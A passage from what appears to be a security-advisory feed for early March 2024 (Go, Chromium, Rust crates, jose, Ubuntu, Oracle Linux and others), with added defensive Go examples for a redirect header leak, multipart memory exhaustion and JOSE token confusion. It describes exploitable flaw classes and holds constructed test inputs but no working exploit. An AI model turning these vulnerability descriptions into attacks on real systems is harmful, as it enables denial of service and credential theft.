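	return strings.TrimSpace(string(body)) == "true", nil
}

func main() {
	srv := demoServer()
	defer srv.Close()
	for _, to := range []string{"api.origin.example", "unrelated.example"} {
		forwarded, err := credentialReachedLanding(srv, to)
		fmt.Printf("redirect to %s: credential forwarded=%v err=%v\n", to, forwarded, err)
	}
}
```

Patched Go applies the same rule inside the client; the harness is the regression check to run against your own client configuration, since a custom `CheckRedirect` that copies headers from `via[0]` onto `req` would reintroduce the leak regardless of the Go version.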
06.03.2024 01:15:07 | alpinelinux | [ALPINE:CVE-2023-45290] go vulnerability
[From CVE-2023-45290] When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion. With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-45290

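One bound that holds whatever net/http version is linked in, as an added example that is not the Go project's code: wrap the request body in `http.MaxBytesReader` before calling `ParseMultipartForm`, so the total request, and therefore any single line or header the multipart parser reads, cannot exceed the cap. The handler maps the resulting `*http.MaxBytesError` to 413 rather than a generic 400, and `submitForm` drives it in-process with constructed fields so the limit can be exercised without a network. The handler path, field names and sizes are assumptions for the example.

```go
// Added example, not code from the Go project: bound the whole multipart body
// with http.MaxBytesReader before ParseMultipartForm, so no single line,
// header or part can drive memory use whatever net/http version is linked
// in. Handler path, field names and sizes are constructed.
package main

import (
	"bytes"
	"errors"
	"fmt"
	"io"
	"mime/multipart"
	"net/http"
	"net/http/httptest"
	"strings"
)

// uploadHandler accepts a multipart form of at most maxBody bytes in total;
// file parts beyond memLimit bytes are spooled to temporary files.
func uploadHandler(maxBody, memLimit int64) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		// MaxBytesReader fails the read once maxBody bytes have been consumed
		// (and, on a real server, marks the connection to be closed). Every
		// byte the parser reads passes through it, so one overlong line is
		// capped as well.
		r.Body = http.MaxBytesReader(w, r.Body, maxBody)
		if err := r.ParseMultipartForm(memLimit); err != nil {
			var tooLarge *http.MaxBytesError
			if errors.As(err, &tooLarge) {
				http.Error(w, "payload too large", http.StatusRequestEntityTooLarge)
				return
			}
			http.Error(w, "malformed multipart form", http.StatusBadRequest)
			return
		}
		defer r.MultipartForm.RemoveAll() // delete any spooled temp files
		fmt.Fprintf(w, "comment=%s", r.FormValue("comment"))
	})
}

// submitForm encodes fields as multipart/form-data, posts them to h
// in-process, and returns the status code and trimmed response body.
func submitForm(h http.Handler, fields map[string]string) (int, string, error) {
	var body bytes.Buffer
	mw := multipart.NewWriter(&body)
	for name, value := range fields {
		if err := mw.WriteField(name, value); err != nil {
			return 0, "", err
		}
	}
	if err := mw.Close(); err != nil {
		return 0, "", err
	}
	req := httptest.NewRequest(http.MethodPost, "/upload", &body)
	req.Header.Set("Content-Type", mw.FormDataContentType())
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	out, err := io.ReadAll(rec.Result().Body)
	if err != nil {
		return 0, "", err
	}
	return rec.Code, strings.TrimSpace(string(out)), nil
}

func main() {
	h := uploadHandler(64<<10, 32<<10) // 64 KiB body cap, 32 KiB kept in memory
	for _, fields := range []map[string]string{
		{"comment": "hello"},
		{"comment": strings.Repeat("x", 200<<10)}, // constructed oversized field
	} {
		code, body, err := submitForm(h, fields)
		fmt.Printf("status=%d body=%q err=%v\n", code, body, err)
	}
}
```

The body cap is a complement to upgrading, not a substitute: it bounds what one request can cost, while the Go fix bounds the per-line allocation inside the parser for bodies that are allowed to be large.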
06.03.2024 01:15:07 | alpinelinux | [ALPINE:CVE-2024-24783] go vulnerability
[From CVE-2024-24783] Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24783

06.03.2024 01:15:07 | alpinelinux | [ALPINE:CVE-2024-24784] go vulnerability
[From CVE-2024-24784] The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24784

06.03.2024 01:15:07 | alpinelinux | [ALPINE:CVE-2024-24785] go vulnerability
[From CVE-2024-24785] If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24785

06.03.2024 02:00:00 | freebsd | [FREEBSD:FD3401A1-B6DF-4577-917A-2C22FEE99D34] chromium -- multiple security fixes
Chrome Releases reports: This update includes 3 security fixes:
- [325893559] High CVE-2024-2173: Out of bounds memory access in V8. Reported by 5fceb6172bbf7e2c5a948183b53565b9 on 2024-02-19
- [325866363] High CVE-2024-2174: Inappropriate implementation in V8. Reported by 5f46f4ee2e17957ba7b39897fb376be8 on 2024-02-19
- [325936438] High CVE-2024-2176: Use after free in FedCM. Reported by Anonymous on 2024-02-20
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:FD3401A1-B6DF-4577-917A-2C22FEE99D34

06.03.2024 02:00:00 | freebsd | [FREEBSD:B1B039EC-DBFC-11EE-9165-901B0E9408DC] go -- multiple vulnerabilities
The Go project reports:
- crypto/x509: Verify panics on certificates with an unknown public key algorithm. Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic.
- net/http: memory exhaustion in Request.ParseMultipartForm. When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permitted a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion.
- net/http, net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect. When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not.
- html/template: errors returned from MarshalJSON methods may break template escaping. If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.
- net/mail: comments in display names are incorrectly handled. The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B1B039EC-DBFC-11EE-9165-901B0E9408DC

06.03.2024 16:01:14 | rustsec | [RUSTSEC-2024-0021] Parts of Report are dropped as the wrong type during downcast
In affected versions, after a `Report` is constructed using `wrap_err` or `wrap_err_with` to attach a message of type `D` onto an error of type `E`, then using `downcast` to recover ownership of either the value of type `D` or the value of type `E`, one of two things can go wrong:
- If downcasting to `E`, there remains a value of type `D` to be dropped. It is incorrectly "dropped" by running `E`'s drop behavior, rather than `D`'s. For example if `D` is `&str` and `E` is `std::io::Error`, there would be a call of `std::io::Error::drop` in which the reference received by the `Drop` impl does not refer to a valid value of type `std::io::Error`, but instead to `&str`.
- If downcasting to `D`, there remains a value of type `E` to be dropped. When `D` and `E` do not happen to be the same size, `E`'s drop behavior is incorrectly executed in the wrong location. The reference received by the `Drop` impl may point left or right of the real `E` value that is meant to be getting dropped.
In both cases, when the `Report` contains an error `E` that has nontrivial drop behavior, the most likely outcome is memory corruption.
When the `Report` contains an error `E` that has trivial drop behavior (for example a `Utf8Error`) but where `D` has nontrivial drop behavior (such as `String`), the most likely outcome is that downcasting to `E` would leak `D`.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0021

06.03.2024 18:08:33 | npm | [NPM:GHSA-82JF-8F24-XQ9M] hexo-theme-anzhiyu Cross-site Scripting vulnerability (moderate)
Cross Site Scripting (XSS) vulnerability in hexo-theme-anzhiyu v1.6.12 allows remote attackers to execute arbitrary code via the algolia search function.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-82JF-8F24-XQ9M

06.03.2024 04:24:35 | rustsec | [RUSTSEC-2024-0020] Stack buffer overflow with whoami on several Unix platforms
With versions of the whoami crate >= 0.5.3 and < 1.5.0, calling any of these functions leads to an immediate stack buffer overflow on illumos and Solaris:
- `whoami::username`
- `whoami::realname`
- `whoami::username_os`
- `whoami::realname_os`
With versions of the whoami crate >= 0.5.3 and < 1.0.1, calling any of the above functions also leads to a stack buffer overflow on these platforms:
- Bitrig
- DragonFlyBSD
- FreeBSD
- NetBSD
- OpenBSD
This occurs because of an incorrect definition of the `passwd` struct on those platforms. As a result of this issue, denial of service and data corruption have both been observed in the wild. The issue is possibly exploitable as well. This vulnerability also affects other Unix platforms that aren't Linux or macOS. This issue has been addressed in whoami 1.5.0. For more information, see [this GitHub issue](https://github.com/ardaku/whoami/issues/91).
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0020

07.03.2024 23:18:06 | ubuntu | [USN-6685-1] mqtt-client vulnerability (high)
mqtt-client could be made to crash if it received specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6685-1

07.03.2024 22:52:17 | ubuntu | [USN-6684-1] ncurses vulnerability (medium)
ncurses could be made to crash if it received specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6684-1

07.03.2024 22:46:46 | slackware | [SSA:2024-067-01] ghostscript (high)
New ghostscript packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/ghostscript-9.55.0-i586-2_slack15.0.txz: Rebuilt.
  Fixes security issues:
  A vulnerability was identified in the way Ghostscript/GhostPDL called
  tesseract for the OCR devices, which could allow arbitrary code execution.
  Thanks to J_W for the heads-up.
  Mishandling of permission validation for pipe devices could allow
  arbitrary code execution.
  For more information, see:
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36664
  (* Security fix *)
```

**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/ghostscript-9.55.0-i586-2_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/ghostscript-9.55.0-x86_64-2_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/ghostscript-10.03.0-i586-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/ghostscript-10.03.0-x86_64-1.txz

**MD5 signatures**
Slackware 15.0 package:
533102bd76c090b72680cf466386a458 ghostscript-9.55.0-i586-2_slack15.0.txz
Slackware x86_64 15.0 package:
b1ee06e28fd81b1d04a3b62a5a953886 ghostscript-9.55.0-x86_64-2_slack15.0.txz
Slackware -current package:
a40a1e316f17c75b753c8d9e3a59dff2 ap/ghostscript-10.03.0-i586-1.txz
Slackware x86_64 -current package:
799f7a0f77d8a2e7624f8b4a97942d45 ap/ghostscript-10.03.0-x86_64-1.txz

**Installation instructions**
Upgrade the package as root:
`# upgradepkg ghostscript-9.55.0-i586-2_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-067-01

07.03.2024 20:54:14 | msrc | [MS:CVE-2024-2176] CVE-2024-2176
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2176

07.03.2024 20:54:12 | msrc | [MS:CVE-2024-2174] CVE-2024-2174
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2174

07.03.2024 20:54:07 | msrc | [MS:CVE-2024-2173] CVE-2024-2173
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2173

07.03.2024 19:40:59 | npm | [NPM:GHSA-HHHV-Q57G-882Q] jose vulnerable to resource exhaustion via specifically crafted JWE with compressed plaintext (moderate)
A vulnerability has been identified in the JSON Web Encryption (JWE) decryption interfaces, specifically related to the [support for decompressing plaintext after its decryption](https://www.rfc-editor.org/rfc/rfc7516.html#section-4.1.3). This allows an adversary to exploit specific scenarios where the compression ratio becomes exceptionally high. As a result, the length of the JWE token, which is determined by the compressed content's size, can land below application-defined limits. In such cases, other existing application level mechanisms for preventing resource exhaustion may be rendered ineffective.

Note that as per [RFC 8725](https://www.rfc-editor.org/rfc/rfc8725.html#name-avoid-compression-of-encryp) compression of data SHOULD NOT be done before encryption, because such compressed data often reveals information about the plaintext. For this reason the v5.x major version of `jose` removed support for compressed payloads entirely and is therefore NOT affected by this advisory.

### Impact
Under certain conditions it is possible to have the user's environment consume an unreasonable amount of CPU time or memory during JWE decryption operations.

### Affected users
The impact is limited only to Node.js users utilizing the JWE decryption APIs to decrypt JWEs from untrusted sources.
You are NOT affected if any of the following applies to you:
- Your code uses jose version v5.x where JWE Compression is not supported anymore
- Your code runs in an environment other than Node.js (e.g. Deno, CF Workers), which is the only runtime where JWE Compression is implemented out of the box
- Your code does not use the JWE decryption APIs
- Your code only accepts JWEs produced by trusted sources

### Patches
`v2.0.7` and `v4.15.5` releases limit the decompression routine to only allow decompressing up to 250 kB of plaintext. In v4.x it is possible to further adjust this limit via the `inflateRaw` decryption option implementation. In v2.x it is possible to further adjust this limit via the `inflateRawSyncLimit` decryption option.

### Workarounds
If you cannot upgrade and do not want to support compressed JWEs you may detect and reject these tokens early by checking the token's protected header:
```js
const { zip } = jose.decodeProtectedHeader(token)
if (zip !== undefined) {
  throw new Error('JWE Compression is not supported')
}
```
If you wish to continue supporting JWEs with compressed payloads in these legacy release lines you must upgrade (v1.x and v2.x to version v2.0.7, v3.x and v4.x to version v4.15.5) and review the limits put forth by the patched releases.

### For more information
If you have any questions or comments about this advisory please open a discussion in the project's [repository](https://github.com/panva/jose/discussions/new?category=q-a&title=GHSA-hhhv-q57g-882q%20advisory%20question)
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HHHV-Q57G-882Q

07.03.2024 16:46:12 | ubuntu | [USN-6683-1] HtmlCleaner vulnerability (high)
libhtmlcleaner-java could be made to crash if it received specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6683-1

07.03.2024 16:00:06 | ubuntu | [USN-6682-1] Puma vulnerabilities (critical)
Several security issues were fixed in Puma.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6682-1

07.03.2024 12:15:07 | alpinelinux | [ALPINE:CVE-2024-1931] unbound vulnerability (high)
[From CVE-2024-1931] NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contain a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-1931

07.03.2024 10:00:00 | msrc | [MS:CVE-2024-26167] Microsoft Edge for Android Spoofing Vulnerability (medium)
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26167

07.03.2024 19:25:52 | maven | [MAVEN:GHSA-J7JM-8GF5-FRCM] nGrinder vulnerable to unsafe Java objects deserialization (high)
nGrinder before 3.5.9 accepts serialized Java objects from unauthenticated users, which could allow a remote attacker to execute arbitrary code via unsafe Java object deserialization.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J7JM-8GF5-FRCM

07.03.2024 02:00:00 | cisa | [CISA-2024:0307] CISA Adds One Known Exploited Vulnerability to Catalog (critical)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0307

07.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1134] tomcat security update (important)
[1:9.0.62-37.el9_3.2]
- Resolves: #2252050 HTTP request smuggling via malformed trailer headers (CVE-2023-46589)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1134

07.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1149] skopeo security update (moderate)
[2:1.13.3-4]
- Rebuild with golang 1.20.12: golang:net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1149

07.03.2024 02:00:00 | oraclelinux | [ELSA-2024-1150] buildah security update (moderate)
[1.31.4-1.0.1]
- update to https://github.com/containers/buildah/releases/tag/v1.31
- https://github.com/containers/buildah/commit/11bbf33
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1150

07.03.2024 02:00:00 | vmware | [VMSA-2024-0007] VMware Cloud Director updates address a partial information disclosure vulnerability (CVE-2024-22256). (moderate)
https://secdb.nttzen.cloud/security-advisory/vmware/VMSA-2024-0007

07.03.2024 02:00:00 | oraclelinux | [ELSA-2024-0461] kernel security update (important)
[5.14.0-362.18.1.el9_3.OL9]
- Update Oracle Linux certificates (Kevin Lyons)
- Disable signing for aarch64 (Ilya Okomin)
- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]
- Update x509.genkey [Orabug: 24817676]
- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5.el9
- Remove nmap references from kernel (Mridula Shastry) [Orabug: 34313944]
- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]
- Disable unified kernel image package build
- Add Oracle Linux IMA certificates
[5.14.0]
- Debranding patches copied from Rocky Linux (Louis Abel and Sherif Nagy from RESF)
[5.14.0-362.18.1.el9_3]
- nfp: fix use-after-free in area_cache_get() (Ricardo Robaina) [RHEL-19456 RHEL-19536 RHEL-6566 RHEL-7241] {CVE-2022-3545}
- rtla: Fix uninitialized variable found (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/timerlat: Do not stop user-space if a cpu is offline (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/timerlat_aa: Fix previous IRQ delay for IRQs that happens after thread sample (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/timerlat_aa: Fix negative IRQ delay (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/timerlat_aa: Zero thread sum after every sample analysis (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/timerlat_hist: Add timerlat user-space support (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/timerlat_top: Add timerlat user-space support (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/hwnoise: Reduce runtime to 75% (John Kacur) [RHEL-18360 RHEL-10079]
- rtla: Start the tracers after creating all instances (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/timerlat_hist: Add auto-analysis support (John Kacur) [RHEL-18360 RHEL-10079]
- rtla/timerlat: Give timerlat auto analysis its own instance (John Kacur) [RHEL-18360 RHEL-10079]
- rtla: Automatically move rtla to a house-keeping cpu (John Kacur) [RHEL-18360 RHEL-10079]
- rtla: Change monitored_cpus from char * to cpu_set_t (John Kacur) [RHEL-18360 RHEL-10079]
- rtla: Add --house-keeping option (John Kacur) [RHEL-18360 RHEL-10079]
- rtla: Add -C cgroup support (John Kacur) [RHEL-18360 RHEL-10079]
- ata: ahci: Add Intel Alder Lake-P AHCI controller to low power chipsets list (Tomas Henzl) [RHEL-19394 RHEL-10941]
- fbcon: set_con2fb_map needs to set con2fb_map! (Jocelyn Falempe) [RHEL-1106 RHEL-1109 RHEL-12930 RHEL-13899] {CVE-2023-38409}
- fbcon: Fix error paths in set_con2fb_map (Jocelyn Falempe) [RHEL-1106 RHEL-1109 RHEL-12930 RHEL-13899] {CVE-2023-38409}
- net: tun: fix bugs for oversize packet when napi frags enabled (Ricardo Robaina) [RHEL-12495 RHEL-12496 RHEL-7186 RHEL-7264] {CVE-2023-3812}
- netfilter: nf_tables: skip immediate deactivate in _PREPARE_ERROR (Florian Westphal) [RHEL-10536 RHEL-10538 RHEL-10537 RHEL-10539] {CVE-2023-4015}
- md: Put the right device in md_seq_next (Nigel Croxon) [RHEL-16363 RHEL-12455]
- dpll: sanitize possible null pointer dereference in dpll_pin_parent_pin_set() (Michal Schmidt) [RHEL-19677 RHEL-19095] {CVE-2023-6679}
- dpll: Fix potential msg memleak when genlmsg_put_reply failed (Michal Schmidt) [RHEL-19677 RHEL-19095] {CVE-2023-6679}
- Bluetooth: L2CAP: Fix use-after-free in l2cap_sock_ready_cb (Bastien Nocera) [RHEL-19003 RHEL-2717] {CVE-2023-40283}
- tcp: enforce receive buffer memory limits by allowing the tcp window to shrink (Felix Maurer) [RHEL-16129 RHEL-11592]
- tcp: adjust rcv_ssthresh according to sk_reserved_mem (Felix Maurer) [RHEL-16129 RHEL-11592]
- md: raid0: account for split bio in iostat accounting (Nigel Croxon) [RHEL-4082 RHEL-2718]
- can: af_can: fix NULL pointer dereference in can_rcv_filter (Ricardo Robaina) [RHEL-19465 RHEL-19526 RHEL-6428 RHEL-7052] {CVE-2023-2166}
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0461

07.03.2024 00:37:10 | ubuntu | [USN-6681-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6681-1

07.03.2024 00:23:11 | ubuntu | [USN-6680-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6680-1

07.03.2024 19:23:56 | maven | [MAVEN:GHSA-P2GX-4434-PF6G] Apache InLong: Logged-in user could exploit an arbitrary file read vulnerability (high)
Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong from 1.8.0 through 1.10.0: an attacker can use a specific payload to read an arbitrary file. Users are advised to upgrade to Apache InLong 1.11.0 or cherry-pick [1] to solve it.
[1] https://github.com/apache/inlong/pull/9673
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P2GX-4434-PF6G

07.03.2024 02:00:00 | freebsd | [FREEBSD:E74DA31B-276A-4A22-9772-17DD42B97559] electron{27,28} -- vulnerability in libxml2 (high)
Electron developers report: This update fixes the following vulnerability: Security: backported fix for CVE-2024-25062.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:E74DA31B-276A-4A22-9772-17DD42B97559

07.03.2024 02:00:00 | freebsd | [FREEBSD:B2CAAE55-DC38-11EE-96DC-001B217B3468] Gitlab -- Vulnerabilities (high)
Gitlab reports:
- Bypassing CODEOWNERS approval allowing to steal protected variables
- Guest with manage group access tokens can rotate and see group access token with owner permissions
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B2CAAE55-DC38-11EE-96DC-001B217B3468

07.03.2024 10:46:25 | almalinux | [ALSA-2024:1134] tomcat security update (important)
tomcat security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1134

07.03.2024 21:03:21 | almalinux | [ALSA-2024:1141] mysql security update (moderate)
mysql security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1141

07.03.2024 01:12:06 | rubysec | [RUBYSEC:JSON-JWT-2023-51774] json-jwt allows bypass of identity checks via a sign/encryption confusion attack
The json-jwt (aka JSON::JWT) gem versions 1.16.5 and below sometimes allows bypass of identity checks via a sign/encryption confusion attack. For example, JWE can sometimes be used to bypass JSON::JWT.decode.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:JSON-JWT-2023-51774

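A check that covers both the compressed-JWE workaround in the jose entry above (GHSA-HHHV-Q57G-882Q, whose own snippet calls `jose.decodeProtectedHeader` in JavaScript) and the sign/encryption confusion in this json-jwt entry, as an added Go example that is not code from either library: `TokenPolicy.Check` classifies a compact token by segment count, decodes the protected header, and refuses an encrypted token where a signed one is expected, an `alg` outside the allowlist, and any `zip` header unless compression is explicitly allowed, all before a key or a decryption routine is touched. It generalizes the page's JavaScript check to the token-kind test as well. `buildToken` produces constructed tokens with dummy signature and ciphertext segments; nothing here verifies or decrypts.

```go
// Added example, not code from jose or json-jwt: a policy check on a compact
// JOSE token that runs before any key is used. It rejects an encrypted token
// where a signed one is expected (the json-jwt confusion), an alg outside
// the allowlist, and a JWE that requests plaintext decompression (the jose
// vector). Tokens built here are constructed with dummy segments.
package main

import (
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Kind is the compact serialization the application expects.
type Kind int

const (
	JWS Kind = iota // header.payload.signature (3 segments)
	JWE             // header.encryptedKey.iv.ciphertext.tag (5 segments)
)

// ProtectedHeader carries the fields the policy inspects.
type ProtectedHeader struct {
	Alg string `json:"alg"`
	Enc string `json:"enc,omitempty"`
	Zip string `json:"zip,omitempty"`
}

// TokenPolicy states what the verifying code is prepared to handle.
type TokenPolicy struct {
	Expect   Kind
	Algs     []string // allowlist for "alg"; "none" is never implied
	AllowZip bool     // keep false unless the decompressor is bounded
}

// Check classifies the token by segment count, decodes the protected header
// and applies the policy. It neither verifies nor decrypts: a token that
// passes must still be verified by the JOSE library with the expected key.
func (p TokenPolicy) Check(token string) (ProtectedHeader, error) {
	var hdr ProtectedHeader
	// Split keeps empty segments, so a JWE with alg "dir" (empty encrypted
	// key) still counts five parts.
	parts := strings.Split(token, ".")
	var kind Kind
	switch len(parts) {
	case 3:
		kind = JWS
	case 5:
		kind = JWE
	default:
		return hdr, fmt.Errorf("malformed compact serialization: %d segments", len(parts))
	}
	if kind != p.Expect {
		return hdr, errors.New("token kind does not match expectation (sign/encryption confusion)")
	}
	raw, err := base64.RawURLEncoding.DecodeString(parts[0])
	if err != nil {
		return hdr, fmt.Errorf("protected header is not base64url: %w", err)
	}
	if err := json.Unmarshal(raw, &hdr); err != nil {
		return hdr, fmt.Errorf("protected header is not JSON: %w", err)
	}
	if !allowed(p.Algs, hdr.Alg) {
		return hdr, fmt.Errorf("alg %q not in allowlist", hdr.Alg)
	}
	if kind == JWE && hdr.Enc == "" {
		return hdr, errors.New("JWE header lacks enc")
	}
	if hdr.Zip != "" && !p.AllowZip {
		return hdr, fmt.Errorf("compressed JWE rejected (zip=%q)", hdr.Zip)
	}
	return hdr, nil
}

// allowed is an exact-match allowlist lookup; an empty alg never matches.
func allowed(list []string, alg string) bool {
	for _, a := range list {
		if alg != "" && a == alg {
			return true
		}
	}
	return false
}

// buildToken assembles a compact token from a header and dummy segments
// (constructed for the example; not a valid signature or ciphertext).
func buildToken(header map[string]string, segments int) string {
	hb, _ := json.Marshal(header)
	parts := []string{base64.RawURLEncoding.EncodeToString(hb)}
	for i := 1; i < segments; i++ {
		parts = append(parts, base64.RawURLEncoding.EncodeToString([]byte("dummy")))
	}
	return strings.Join(parts, ".")
}

func main() {
	signed := TokenPolicy{Expect: JWS, Algs: []string{"ES256"}}
	for _, tok := range []string{
		buildToken(map[string]string{"alg": "ES256", "typ": "JWT"}, 3),
		buildToken(map[string]string{"alg": "dir", "enc": "A256GCM"}, 5),
		buildToken(map[string]string{"alg": "dir", "enc": "A256GCM", "zip": "DEF"}, 5),
	} {
		_, err := signed.Check(tok)
		fmt.Printf("JWS-only policy: %v\n", err)
	}
}
```

The point of the segment-count test is that the application, not the token, decides whether signing or encryption is in play; a library entry point that auto-detects the kind from the input is exactly the surface the json-jwt advisory describes.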
08.03.2024 18:36:49 | suse | [SUSE-SU-2024:0825-1] Security update for cpio (moderate)
Security update for cpio
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0825-1

08.03.2024 18:34:54 | suse | [SUSE-SU-2024:0824-1] Security update for cpio (moderate)
Security update for cpio
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0824-1

08.03.2024 13:06:14 | suse | [SUSE-SU-2024:0820-1] Security update for python310 (important)
Security update for python310
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0820-1

08.03.2024 13:05:24 | suse | [SUSE-SU-2024:0819-1] Security update for wpa_supplicant (important)
Security update for wpa_supplicant
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0819-1

08.03.2024 13:04:01 | suse | [SUSE-SU-2024:0818-1] Security update for wpa_supplicant (important)
Security update for wpa_supplicant
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0818-1

08.03.2024 13:03:19 | suse | [SUSE-SU-2024:0817-1] Security update for jetty-minimal (important)
Security update for jetty-minimal
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0817-1

08.03.2024 10:32:10 | suse | [SUSE-SU-2024:0815-1] Security update for openssl-3 (moderate)
Security update for openssl-3
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0815-1

08.03.2024 10:31:53 | suse | [SUSE-SU-2024:0814-1] Security update for openssl-1_0_0 (moderate)
Security update for openssl-1_0_0
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0814-1

